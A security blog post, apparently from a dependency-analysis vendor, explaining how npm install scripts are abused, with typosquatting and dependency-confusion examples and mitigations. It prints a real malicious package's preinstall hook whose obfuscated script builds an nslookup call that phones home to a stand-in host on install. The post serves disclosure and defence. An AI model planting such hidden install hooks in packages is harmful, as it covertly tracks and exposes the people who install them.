How npm install scripts can be weaponized: A real-world example of a harmful npm package

How npm preinstall and postinstall scripts can serve as methods to inject malicious code into open source packages.

Author: Edward Thomson / 10 mins read / Mar 3, 2024
Cybersecurity

At the beginning of 2020, my boss at GitHub pulled me into a surprise meeting. “I think that we’re going to buy npm,” he told me. “The npm registry keeps growing, and the team managing it can’t keep up. We want to make sure that the npm registry stays online. Anyway, I want you to manage Product for npm.”

Up until that point, like many – dare I say most – developers, I had used npm, but I hadn’t really thought deeply about it. I knew that if I wanted to install some package for Node.js, I ran npm install. I knew that I used npm as a frontend – running npm run start or something like it – to actually execute my Node.js apps. And I knew that npm had recently started alerting me when a package in my dependency chain had a known vulnerability.

And I also had a personal connection: there was a project called NodeGit that provided a JavaScript interface to libgit2, a project that I maintain. I had worked a bit with the team that wrote NodeGit, and I knew that when you ran npm install, it would build a copy of libgit2 automatically.

So I knew that npm had a notion of “lifecycle scripts” – including some that could run during package installation. But as soon as I was faced with being responsible for npm, I realized that there was a pretty significant risk here: people wouldn’t just publish packages with helpful scripts to the registry.

Attackers could also put malicious scripts into the registry pretty easily, and if they convinced people to install their packages, could do some real harm.

Many people, of course, had come to this realization long before me – including, we quickly discovered, attackers. So one of the core investments that GitHub made after acquiring npm was to improve its security posture. With that investment, today the npm team mitigates many malicious packages before they’re even published, and the GitHub Trust and Safety team works diligently to take down risky packages promptly when they’re discovered by security researchers at organizations like Stacklok.

At Stacklok, we look at packages in the npm registry as part of our Trusty product, analyzing things like their activity and provenance so that our users can make informed decisions about their dependencies. And we also find packages that do malicious things. Here’s an example of one of the real-life packages that we’ve discovered in the npm registry that exhibits some harmful behavior.

An example of a malicious package

This is a slightly redacted version of a real package that was published to npmjs.com and detected by researchers at Stacklok. This isn’t the most malicious package, but it makes an excellent example since it has a script that is small, easy to understand, and shows some of the tactics that package authors use to hide their intent. We’ve changed only the package name and the hostname, so that we can illustrate the methods without revealing the exact hostname that was used or giving the author unwanted attention.

The original package had a name that disguised its intent, and it included a package.json that specified a preinstall script that would – by default – be executed when the package was installed. The preinstall script ran install.sh, a shell script that was bundled with the package.

JSON
{
  "name": "very-trustyworthy-package",
  "version": "0.0.42",
  "scripts": {
    "preinstall": "sh install.sh"
  }
}
Shell (Bash)
#!/usr/bin/env sh

echo "Starting build..."
amount=ample
former=ex
organization=org
install_a=nslo
install_b=okup

$install_a$install_b trustworthy-package.xyz.$former$amount.$organization >/dev/null

echo "Build succeeded..."

Looking at install.sh, it may take a moment to grasp what’s going on, because the script has been obfuscated. Fundamentally, the script sets some variables, then concatenates them to form the command that it actually runs:

Shell (Bash)
nslookup trustworthy-package.xyz.example.org >/dev/null
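
To check that reading without contacting any server, the same concatenation can be reproduced in a script that only prints the resulting command instead of running it. This is a minimal sketch: the variable values are copied from install.sh, while hidden_command is a name introduced here purely for illustration.

```shell
#!/usr/bin/env sh
# Variable values copied from the obfuscated install.sh.
amount=ample
former=ex
organization=org
install_a=nslo
install_b=okup

# Build the command as a string and print it; nothing is executed
# and no DNS lookup is made. hidden_command is a hypothetical name.
hidden_command="$install_a$install_b trustworthy-package.xyz.$former$amount.$organization"
echo "$hidden_command"
```

Printing the string rather than executing it is the safer way to inspect a suspicious script, since the fragments only become a command once the shell expands and runs them.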

So when you run npm install on this package, or on a package that declares this package as a dependency, it will not actually perform any of the builds that it claims to do. Instead, it will perform a DNS lookup for trustworthy-package.xyz.example.org. The owner of the xyz.example.org domain can see when someone performs that DNS lookup, so they know when someone has installed their “trustyworthy package”, and can even learn some information about that person, like their public IP address.

In other words, this package “phones home” to indicate that it was installed. Thankfully, the package isn’t downloading or installing any additional software, or trying to turn our machines into a botnet. It also doesn’t appear to be trying to exfiltrate any data from our computer or upload our source code. But it does tell the attacker that we installed the package and they tricked us into running their script.

It’s impossible to know exactly what the author’s motivation was in publishing this package. It could be a package used by a security researcher as a proof of concept. When you monitor the npm registry, you quickly discover that numerous packages are published to demonstrate problems within an organization. This particular package may be used by a pentester or red team to illustrate how a company’s current setup makes it vulnerable to dependency confusion attacks.

But this could also be a “canary” in an actual dependency confusion attack. The author may have uploaded this package as a comparatively harmless dependency, and now they’re trying to sneak it into an organization. Maybe they’re doing some social engineering, or testing to see if someone will install it accidentally, through a typo. When someone does eventually install the package, it will “phone home” to the author, who will then know that their canary has made its way into somebody’s software supply chain. The author can then publish a newer version of the package that does exfiltrate some data.

Regardless of their intent, we disclose these packages to the team that manages the npm registry. Uploading malicious code is against the npm terms of service, even when it’s being used for research. The GitHub Trust and Safety team reviews these reports and deletes the packages from the registry promptly.

How can install scripts be weaponized?

A package with a malicious install script doesn’t actually cause any harm until it's downloaded and installed so that the install script is actually executed. There are three common attacks that leverage npm’s install scripts.

  • Package takeover attacks occur when a malicious actor gains the ability to publish an existing package, either through the source code repository or by publishing directly to a registry.

  • Typosquatting attacks occur when a malicious actor publishes a package that has a name like a popular package, and relies on people mistyping (or misreading) a malicious package as if it were the package that they meant to install. For example, a malicious package named nextt might accidentally get installed by people meaning to run npm install next.

  • Dependency confusion attacks target individual organizations with malicious packages that have the same name as their internal packages. These attacks require knowledge of the organization’s internal packages and rely on the target’s internal package registry being configured to “fall back” to serving packages from the public registry. For example, imagine Duff Industries has a package named duff-telemetry@1.2.3 hosted on their internal package registry. An attacker may be able to publish a package named duff-telemetry@99.0.0 to the public registry, which will be served instead of the correct package since it has a higher version number.

In any of these situations, an attacker can execute arbitrary code on a target’s machine.
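
The version comparison behind the dependency confusion example can be sketched in a few lines of shell. This is only an illustration of a naive “highest version wins” rule, not npm’s or any registry proxy’s actual resolution logic; higher_version is a hypothetical helper, and it assumes plain MAJOR.MINOR.PATCH versions with no pre-release tags.

```shell
#!/usr/bin/env sh
# higher_version A B: print whichever of two MAJOR.MINOR.PATCH versions is higher.
# Hypothetical helper; the body runs in a subshell so the IFS change stays local.
higher_version() (
  v1=$1
  v2=$2
  set -f          # disable globbing while splitting unquoted values
  IFS=.
  set -- $v1 $v2  # $1 $2 $3 = fields of v1, $4 $5 $6 = fields of v2
  if [ "$1" -ne "$4" ]; then
    if [ "$1" -gt "$4" ]; then echo "$v1"; else echo "$v2"; fi
  elif [ "$2" -ne "$5" ]; then
    if [ "$2" -gt "$5" ]; then echo "$v1"; else echo "$v2"; fi
  elif [ "$3" -ge "$6" ]; then
    echo "$v1"
  else
    echo "$v2"
  fi
)

# Internal duff-telemetry is 1.2.3; the attacker publishes 99.0.0 publicly.
higher_version 1.2.3 99.0.0   # prints 99.0.0
```

Under a rule like this, the attacker only needs to pick a version number larger than anything the organization has published internally.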

When are install scripts useful?

You might be thinking that we should just get rid of install scripts altogether. But the preinstall and postinstall scripts are valuable for many packages.

A clever use of an install script is in the Jakyll project, which is a simple static website generator. Jakyll contains a postinstall script that will bootstrap a GitHub Actions workflow for you. So when you install Jakyll, you’ll have a workflow that deploys your site to GitHub Pages without needing to set it up. This makes for a delightful developer experience.

preinstall scripts are often used to install mandatory dependencies, particularly by packages that interact with other applications or with native libraries. As mentioned earlier, the NodeGit package is a set of JavaScript “bindings” for the libgit2 project, which is written in C. NodeGit includes install scripts that will try to download pre-built versions of libgit2 for your system, and if they don’t exist, will actually compile libgit2 on your computer.

Without being able to run the preinstall script to install the native dependency, NodeGit simply wouldn’t work.

How to keep yourself safe

Thankfully, GitHub has made significant investments in keeping the npm registry safe and secure. For example, the registry now rejects publishes of packages that look like typosquatting attacks. But no effort can be perfect, so you should be thoughtful about the dependencies that you use.

The common guidance is that you should avoid installing code that you’re not familiar with, whenever possible. And that is great advice, but it’s not always realistic because the average JavaScript project has over 500 dependencies! So even if you carefully audit your direct dependencies, it’s almost impossible to audit all your dependencies’ dependencies.

One option that can help is to run npm with the --ignore-scripts option. For example: npm install --ignore-scripts next. This will ensure that none of the preinstall or postinstall scripts are run in next or in any of its dependencies, which protects you from packages that carry malicious install scripts. But it will also break some packages that legitimately need to download or build dependencies. So you should be thoughtful about using this option.
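
When deciding whether --ignore-scripts is workable for a project, it can help to see which installed packages declare install scripts at all. The following is a rough sketch rather than a complete audit: list_install_scripts is a hypothetical helper that searches package.json files as plain text, so it is a heuristic and can report false positives (for example, a dependency that happens to be named install).

```shell
#!/usr/bin/env sh
# list_install_scripts DIR: print the package.json files under DIR that appear
# to declare a preinstall, install, or postinstall entry.
# Hypothetical helper; it matches text and does not parse JSON.
list_install_scripts() {
  find "$1" -type f -name package.json \
    -exec grep -lE '"(preinstall|install|postinstall)"[[:space:]]*:' {} +
}

# Example usage, after installing with scripts disabled:
#   npm install --ignore-scripts
#   list_install_scripts node_modules
```

Packages that show up in this list are the ones to review, since they are the ones whose behavior changes when install scripts are disabled.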

Instead of trying to solve these problems manually, you may want to use some automated dependency analysis and enforcement. That’s why we developed free-to-use tools like Trusty and Minder.

Trusty by Stacklok can help you understand the health of your dependencies and the potential risks in using new packages. Trusty is unique in that it looks at a package both on its own and with a holistic view of the ecosystem. Trusty looks at things like how often a package is being published, who is contributing to it, and whether it’s being developed with industry standard best practices. All of the malicious packages that we’ve detected have very low Trusty Scores, most of them 0.0.

You can then use a tool like Minder by Stacklok to monitor these dependencies and how they fit into your software development lifecycle (SDLC). For example, you can configure Minder to examine pull requests coming into your GitHub repository, look at new dependencies being added in PRs, and check the Trusty Score of those dependencies. Minder can then alert you, or even block a pull request that introduces new dependencies with a low Trusty Score. This is a low-friction way to analyze questionable dependencies before merging the PR that introduces them.

With Trusty and Minder together, if a developer accidentally mistypes a package name and succumbs to a typosquatting attack, it can be caught when the pull request is opened, before it is integrated into your source tree.

In conclusion

There’s been significant research into using install scripts as an attack vector, and thankfully, significant investment by the npm team into mitigating that risk. Despite that, even in 2024, install scripts do represent a real risk through package takeovers, typosquatting, and dependency confusion attacks.

I encourage you to be thoughtful about the packages that you install, and to use scanning and policy tools to help you combat those risks.

Edward Thomson

Product Manager

Edward is a product manager at Stacklok, overseeing product strategy for Stacklok’s products, Minder and Trusty. Prior to Stacklok, he was Director of Product Management at Vercel, and a product manager at GitHub focused on GitHub Actions and npm.